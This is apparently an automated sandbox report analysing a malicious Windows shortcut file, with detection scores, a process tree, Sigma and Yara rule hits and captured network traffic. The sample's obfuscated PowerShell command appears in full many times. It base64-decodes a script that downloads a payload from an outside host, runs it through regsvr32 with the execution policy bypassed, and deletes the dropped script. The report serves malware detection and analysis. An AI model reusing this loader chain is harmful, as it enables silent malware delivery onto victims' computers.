Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DRlFlg7OV8.lnk

Overview

General Information

Sample name:DRlFlg7OV8.lnk
renamed because original name is a hash value
Original sample name:09f44c33ba0a5f1e22cd5b8b0d40c9808e2668ee9050ac855a6ae0744bc9e924.lnk
Analysis ID:1583270
MD5:3952caf999263773be599357388159e0
SHA1:76c39a3a4823beab79e497bfcdbc2367188d95c4
SHA256:09f44c33ba0a5f1e22cd5b8b0d40c9808e2668ee9050ac855a6ae0744bc9e924
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Machine Learning detection for sample
Powershell creates an autostart link
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Windows shortcut file (LNK) contains suspicious command line arguments
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Scripting/CommandLine Process Spawned Regsvr32
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64_ra
  • powershell.exe (PID: 6984 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "SRW735125373WM.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvem5zclBlY1hWYi5kTW8=')) > "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6440 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)
      • regsvr32.exe (PID: 6520 cmdline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/znsrPecXVb.dMo MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
  • svchost.exe (PID: 6344 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 6984INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x2ebb:$b2: ::FromBase64String(
  • 0x2de06:$b2: ::FromBase64String(
  • 0x2e0b1:$b2: ::FromBase64String(
  • 0x7f285:$b2: ::FromBase64String(
  • 0x7f3b2:$b2: ::FromBase64String(
  • 0x8417d:$b2: ::FromBase64String(
  • 0x127800:$b2: ::FromBase64String(
  • 0x127a78:$b2: ::FromBase64String(
  • 0x127f65:$b2: ::FromBase64String(
  • 0x128407:$b2: ::FromBase64String(
  • 0x12fc26:$b2: ::FromBase64String(
  • 0x13db81:$b2: ::FromBase64String(
  • 0x146046:$b2: ::FromBase64String(
  • 0x152112:$b2: ::FromBase64String(
  • 0x1523bd:$b2: ::FromBase64String(
  • 0x295aa0:$b2: ::FromBase64String(
  • 0x295ecb:$b2: ::FromBase64String(
  • 0x2961bb:$b2: ::FromBase64String(
  • 0x299405:$b2: ::FromBase64String(
  • 0x117b1:$s1: -join
  • 0x11efe:$s1: -join

Sigma Signatures

System Summary

barindex
Sigma detected: Base64 Encoded PowerShell Command Detected
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "SRW735125373WM.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvem5zclBlY1hWYi5kTW8=')) > "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "SRW735125373WM.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvem5zclBlY1hWYi5kTW8=')) > "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1", CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4380, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "SRW735125373WM.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvem5zclBlY1hWYi5kTW8=')) > "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1", ProcessId: 6984, ProcessName: powershell.exe
Sigma detected: Potentially Suspicious PowerShell Child Processes
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/znsrPecXVb.dMo, CommandLine: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/znsrPecXVb.dMo, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6440, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/znsrPecXVb.dMo, ProcessId: 6520, ProcessName: regsvr32.exe
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "SRW735125373WM.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvem5zclBlY1hWYi5kTW8=')) > "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "SRW735125373WM.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvem5zclBlY1hWYi5kTW8=')) > "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1", CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4380, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "SRW735125373WM.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvem5zclBlY1hWYi5kTW8=')) > "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1", ProcessId: 6984, ProcessName: powershell.exe
Sigma detected: Script Interpreter Execution From Suspicious Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "SRW735125373WM.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvem5zclBlY1hWYi5kTW8=')) > "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "SRW735125373WM.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvem5zclBlY1hWYi5kTW8=')) > "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1", CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4380, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "SRW735125373WM.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvem5zclBlY1hWYi5kTW8=')) > "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1", ProcessId: 6984, ProcessName: powershell.exe
Sigma detected: Suspicious Script Execution From Temp Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1, CommandLine|base64offset|contains: ^rbzh'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "SRW735125373WM.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvem5zclBlY1hWYi5kTW8=')) > "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6984, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1, ProcessId: 6440, ProcessName: powershell.exe
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "SRW735125373WM.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvem5zclBlY1hWYi5kTW8=')) > "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "SRW735125373WM.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvem5zclBlY1hWYi5kTW8=')) > "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1", CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4380, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "SRW735125373WM.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvem5zclBlY1hWYi5kTW8=')) > "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1", ProcessId: 6984, ProcessName: powershell.exe
Sigma detected: Scripting/CommandLine Process Spawned Regsvr32
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/znsrPecXVb.dMo, CommandLine: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/znsrPecXVb.dMo, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6440, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/znsrPecXVb.dMo, ProcessId: 6520, ProcessName: regsvr32.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "SRW735125373WM.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvem5zclBlY1hWYi5kTW8=')) > "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "SRW735125373WM.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvem5zclBlY1hWYi5kTW8=')) > "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1", CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4380, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "SRW735125373WM.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvem5zclBlY1hWYi5kTW8=')) > "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1", ProcessId: 6984, ProcessName: powershell.exe
Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6984, TargetFilename: C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 656, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6344, ProcessName: svchost.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-02T10:04:37.521177+010018100001Potentially Bad Traffic192.168.2.1649706166.62.28.14780TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: DRlFlg7OV8.lnkAvira: detected
Multi AV Scanner detection for submitted file
Source: DRlFlg7OV8.lnkVirustotal: Detection: 62%Perma Link
Source: DRlFlg7OV8.lnkReversingLabs: Detection: 66%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.1% probability
Machine Learning detection for sample
Source: DRlFlg7OV8.lnkJoe Sandbox ML: detected
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1275850448.0000027B9D226000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000004.00000002.1275850448.0000027B9D226000.00000004.00000020.00020000.00000000.sdmp

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 1810000 - Severity 1 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.16:49706 -> 166.62.28.147:80
Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
Source: global trafficHTTP traffic detected: GET /fmlib/IxBABMh0I2cLM3qq1GVv/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: focusmedica.inConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /fmlib/IxBABMh0I2cLM3qq1GVv/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: focusmedica.inConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: focusmedica.in
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 02 Jan 2025 09:04:36 GMTServer: ApacheContent-Length: 315Keep-Alive: timeout=5Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
